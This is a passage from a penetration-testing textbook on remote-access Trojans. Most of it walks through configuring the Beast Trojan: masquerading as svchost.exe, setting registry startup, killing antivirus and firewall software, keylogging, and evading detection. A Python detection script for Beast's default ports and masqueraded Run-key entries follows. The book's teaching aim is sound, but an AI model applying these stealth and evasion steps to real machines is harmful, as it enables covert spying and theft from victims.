Under fun manager are numerous fun tools that, although not necessarily useful to penetration testers, are commonly used by malicious hackers. The first of these options under the fun manager tab is the desktop/webcam feature shown in Figure 12-47. Here you can open a screen preview of what the user on the target system is looking at, perform a full screen capture, or perform a webcam/quickcam capture.

Figure 12-47. SubSeven Desktop/Webcam Capture


A Spanish student by the initials of G.J.A.L. used the webcam capture utility in January 2002 to spy on a woman by capturing webcam images of her while she sat in front of the computer. He then took the images and e-mailed them to his friends. He was caught when he accidentally sent a picture of the girl to her when he meant to send it to a friend. He was arrested and fined 3000 euros for the crime.

The fun manager and the extra fun tab have many other options that malicious hackers use as pranks or to notify their victims that they are under attack. Table 12-3 illustrates the various options available under these tabs.

Table 12-3. Fun Manager and Extra Fun Options

Fun manager tab:

  • Desktop/webcam: Takes a screen capture.

  • Flip screen: Flips screen vertically or horizontally.

  • Print: Causes text that the hacker chooses to be printed to the default printer on the victim machine.

  • Browser: Opens a web browser on the computer of the victim to a web page that the malicious hacker chooses.

  • Resolution: Changes the resolution settings on the victim computer.

  • Win colors: Changes the number of colors supported by the victim machine.

Extra fun tab:

  • Screen saver: Changes the screensaver on the victim machine.

  • Restart win: Performs a simple DoS attack by shutting down Windows, logging off the current user, or rebooting the system.

  • Mouse: Controls the mouse of the victim machine. Allows you to reverse mouse buttons, hide the mouse pointer, control the mouse, set the mouse trail size, or hide the mouse trails (commonly used on laptops).

  • Sound: Changes the default sounds.

  • Time/date: Changes the time and date on the victim computer.

  • Extra: Allows you to hide/show the desktop, start button, or taskbar; opens/closes the CD-ROM tray; turns on/off the monitor, ctrl-alt-delete, caps lock, scroll lock, num lock; starts/stops the speaker.


Brown Orifice

Brown Orifice, named after Back Orifice and written by Dan Brumleve, is a Trojan that exploits a Java security hole in the Netscape web browser versions 4.0 through 4.74. When an unsuspecting user browses to a site with the Brown Orifice Java applet, his computer becomes infected with the Trojan. His computer then becomes a web server listening on TCP port 8080 and allows others to access all files on his hard drive. You can access files through the web browser by using the file:// URL syntax. For example, to see the files at the root of a hard drive on an infected computer with the IP address of 192.168.1.29, type this:

file:///192.168.1.29:8080/c:/

Brown Orifice runs only as long as the Java Virtual Machine is active. This is usually active only when the web browser is running, so when the user closes his Netscape web browser, the Trojan is stopped (until the web browser is started again).

Beast

Beast is a remote administration Trojan written in Delphi by Tataye at Fearless Crew (http://www.tataye.tk). Beast is unique among the Trojans in this chapter in that the client, server, and server configuration utility are all in one executable.

Beast caught media attention in October 2003 when Van Dinh was arrested after using the Beast Trojan to capture keystrokes of an investor accessing an online brokerage website. It is estimated that Van Dinh, who was 19 at the time, caused more than $37,000 worth of damage.

The Beast executable, shown in Figure 12-48, has two main sections:

  • Server settings

  • Client

Figure 12-48. Beast Executable


Beast Server Settings

To access these server settings, click on the Build Server button. You can configure six areas, as described in Table 12-4.

Table 12-4. Beast Server Settings

  • Basic: Set the server name, port, and password. Also select how you want to package (bind) the Trojan and in what directory you want to place it.

  • Notifications: Configure how you want to be notified of an infected host. Options include CGI, e-mail, ICQ, and static IP notification (SIN).

  • StartUp: Configure how you want the Trojan started when Windows loads. Options include ActiveX, HKey Local Machine, and HKey Current User.

  • AV-FW Kill: Configure Beast to stop any anti-virus or firewall applications.

  • Misc.: Configure keylogging, fake error messages, and other options.

  • Exe Icon: Configure the icon that the Beast server uses.


Figure 12-49 shows the first of these options, the Basic server settings.

Figure 12-49. Beast Basic Server Settings


First, enter the name of the server and, optionally, the password you want to use to connect to the server. Some malicious hackers use passwords to prevent other malicious hackers from using the Trojan. When picking a name, choose one that mimics a Windows executable, such as svchost.exe. This provides stealth, because a systems administrator who sees a program such as svchost.exe running has no way of knowing from the name alone that a Trojan is running. However, do not put the Trojan in the same directory as the legitimate executable, because it would overwrite the system file. You have two locations to place the Trojan: the Windows directory or the Windows/system directory. If the legitimate file is in the Windows directory, choose the Windows/system directory. Likewise, if the legitimate file is in the Windows/system directory, place the Trojan in the Windows directory.

Next, you need to configure the server to use either direct connection or reverse connections. With a direct connection, you manually enter the IP address of the infected host in the client and connect directly to the Trojan. With a reverse connection, the Trojan notifies you with its IP address, causing the Trojan server to initiate the connection to the client. If you choose reverse connection, you need to enter a static IP notification (SIN) port number or keep it at the default port 9999. If you are using a direct connection, you can skip configuring a SIN port number, but you might want to configure the listening port. (The default is 6666.)

Next, you should configure how you want to inject the Trojan. You can bind the Trojan to Internet Explorer, Explorer.exe, or to another executable, such as Notepad.exe. You can also choose not to wrap the Trojan, but that does not provide as much stealth.

If you want to be notified when a host is infected with the server, click on the Notifications button and configure the way you want to be notified. (See Figure 12-50.) Your options include these:

  • SIN

  • E-mail

  • ICQ

  • CGI

Figure 12-50. Beast Notification Options


Putting a Trojan on a system and running it is not enough, however. You might also want to configure the infected system so that it runs the Trojan on startup. You can do this by clicking on the StartUp button shown in Figure 12-51. Here, you can choose to run the Trojan via the ActiveX method, HKey Local Machine, or HKey Current User. Only use the ActiveX method when you bind Beast to Internet Explorer. The HKey Local Machine option adds a registry entry that affects all users who log into the machine, whereas the HKey Current User option runs the Trojan only when the infected user logs onto the system.

Figure 12-51. Beast StartUp Options


After you set the StartUp options, you should select the AV-FW Kill settings shown in Figure 12-52. Beast recognizes hundreds of common firewall and anti-virus software applications, including the built-in XP firewall. Using this feature, you can terminate these security applications. Because many of the popular anti-virus and firewall applications can be configured to be restarted if they are terminated, Beast provides an option to continually terminate them for a specified number of seconds. (The default is five seconds.)

Figure 12-52. Beast AV-FW Kill


Beast also has miscellaneous server options. (See Figure 12-53.) Common options include melting the server on install, enabling a keylogger, and clearing restore points on Windows XP machines. Melting the server on install removes the executable server file when the Trojan is executed. The Trojan remains running in RAM but does not exist as a file on the hard drive. Note that if you select this option, you cannot select the Windows startup options because the Trojan file no longer exists when the computer reboots. Enabling the keylogger allows you to monitor whatever users are typing on the infected host. The third common option is to clear restore points. Windows XP provides a restore feature to help restore your computer to a previous state if the system gets corrupted. Choosing to clear restore points prevents the infected host from being able to revert to a previous known-good state.

Figure 12-53. Beast Miscellaneous Server Options


The final server setting is to choose the Exe Icon, as shown in Figure 12-54. Although the choice you make is not that significant, you should choose a common Windows icon so that you do not raise suspicion. This becomes especially important if you are attempting to send the Trojan via e-mail, because the unsuspecting user sees the icon and has to evaluate it to determine if it is safe.

Figure 12-54. Beast Exe Icon


After you have finished selecting your server options, select the Save Server button.

Next, you need to upload the Trojan and execute it on the server, as you did with the other Trojans mentioned in this chapter.

Many anti-virus software programs detect Beast as a Trojan and do not allow it to be installed. If you want to circumvent this detection, you need a modified version of Beast. The author of Beast offers such a modified version for a small fee. He mutates the program into a unique copy that anti-virus software applications do not detect.

Beast Client

When you have finished uploading and executing the Trojan on your target host, you will want to control the server remotely. To do this, enter the IP address and, if configured, the password. Then click Connect from the main Beast program window. If you have chosen a different port number than the default of 6666, enter that, too. You then see the screen shown in Figure 12-55.

Figure 12-55. Beast Client


Seven categories of client control utilities exist:

  • Managers

  • Windows

  • Lamer Stuff

  • Fun Stuff

  • Server

  • Misc

  • Beast Stuff

From the Managers category, you can manage the Windows file system (see Figure 12-56), control the registry, see the screen, enable the webcam, manage applications or processes, start and stop services (see Figure 12-57), and collect passwords (see Figure 12-58). You can also retrieve protected storage, ICQ, and dial-up passwords.

Figure 12-56. Beast File Manager


Figure 12-57. Beast Services Manager


Figure 12-58. Beast Password Retrieval Utility


The Windows options, shown in Figure 12-59, allow you to hide windows, crash programs, reboot, shut down, and log off users. These options are commonly used as a DoS attack.

Figure 12-59. Beast Windows Options


The Lamer Stuff options (shown in Figure 12-60) allow many of the same gimmick functions found in other Trojans mentioned in this chapter. Here you can swap mouse buttons, close the CD-ROM tray, and hide common desktop items such as the clock or desktop icons.

Figure 12-60. Beast Lamer Stuff


The next option, Fun Stuff, is closely related to the previous utilities. Shown in Figure 12-61, here you can hide the mouse, change the wallpaper, chat with the user on the infected host, or launch a web browser and go to a website of your choosing.

Figure 12-61. Beast Fun Stuff


Next is the Server option, shown in Figure 12-62. Here you can update the server to the current version (2.06 at the time of writing) or close the server. If you suspect that your Trojan might be detected, you might want to terminate it from running.

Figure 12-62. Beast Server Options


Earlier, in the server setup, you had the option of configuring a keylogger. To activate the keylogger, click on the Misc button, shown in Figure 12-63. Note that this requires a plug-in to be uploaded to the server. You can either preload the plug-ins by clicking the Plugins button, or you can load it upon selecting the KeyLogger function.

Figure 12-63. Beast Misc. Options


The Misc options also include a Scanner feature. As shown in Figure 12-64, this feature scans an IP subnet and detects any other hosts that are infected with the Beast Trojan.

Figure 12-64. Beast Scanner


Like the Donald Dick and SubSeven Trojans, you can send a message to the infected host. In Beast, you can find this message option under the Misc options, along with the Scanner and KeyLogger utilities. Figure 12-65 shows the various options available with sending a custom error message to the server, a technique commonly used with social engineering. (For more on social engineering, see Chapter 4.)

Figure 12-65. Beast Custom Error Messages


Finally, Beast offers the capability to run your own program. Also found in the Misc options, the Run Appz feature in Figure 12-66 lets you run a program of your choice. Figure 12-66 shows the netstat program running to show which TCP and UDP ports are listening. The first entry is an established TCP connection on port 6666, which happens to be the default port that Beast runs on.

Figure 12-66. Beast Run Appz
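The placement rules from the Basic settings (a server named after a Windows binary, dropped in \Windows or \Windows\system), the HKey Local Machine and HKey Current User StartUp entries, and the port 6666 connection visible in Figure 12-66 are also what a defender looks for on a suspect host. The following is an added example, not code from the book or from Beast: it parses constructed netstat -ano and reg query output of the standard Run keys and flags Run-key programs that borrow a system binary's name from outside System32, plus TCP rows on Beast's default ports 6666 and 9999; the binary list, sample output, and process IDs are assumptions.

```python
import re
from pathlib import PureWindowsPath

BEAST_DEFAULT_PORTS = {6666, 9999}  # chapter's defaults: listener and SIN; trivially changed
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
LEGIT_DIRS = {"system32", "syswow64"}  # where the real copies of those binaries live
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")
REG_VALUE_RE = re.compile(r"^\s+(.+?)\s+(REG_\w+)\s+(.*\S)\s*$")

def suspicious_connections(netstat_text):
    """TCP rows of 'netstat -ano' output whose local or remote port is a Beast default."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)  # header, blank and UDP rows do not match
        if m:
            local, lport, remote, rport, state, pid = m.groups()
            if {int(lport), int(rport)} & BEAST_DEFAULT_PORTS:
                hits.append({"local": f"{local}:{lport}", "remote": f"{remote}:{rport}",
                             "state": state, "pid": int(pid)})
    return hits

def program_path(command):
    command = command.strip()  # Run-key data: a quoted path with args, or a bare path
    if command.startswith('"') and command.find('"', 1) > 0:
        return command[1:command.find('"', 1)]
    return command.split()[0]

def masqueraded_autoruns(reg_text):
    """Run-key values that borrow a system binary's name but run from outside System32."""
    hits, key = [], None
    for line in reg_text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = REG_VALUE_RE.match(line)
        if m:
            name, _type, data = m.groups()
            p = PureWindowsPath(program_path(data))
            if p.name.lower() in SYSTEM_BINARIES and p.parent.name.lower() not in LEGIT_DIRS:
                hits.append({"key": key, "value": name, "path": str(p)})
    return hits

# Constructed sample output, not captured from a real host.
NETSTAT_SAMPLE = r"""
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       1480
  TCP    192.168.1.29:6666      192.168.1.10:1043      ESTABLISHED     1480
"""
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    ctfmon     REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    svchost    REG_SZ    C:\WINDOWS\system\svchost.exe
"""
```

Both checks are heuristics: a renamed server, a non-default port, or the melt-on-install option from the Misc settings defeats them, so treat a hit as a lead for further triage rather than proof.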




    Penetration Testing and Network Defense
    ISBN: 1587052083
    Year: 2005
    Pages: 209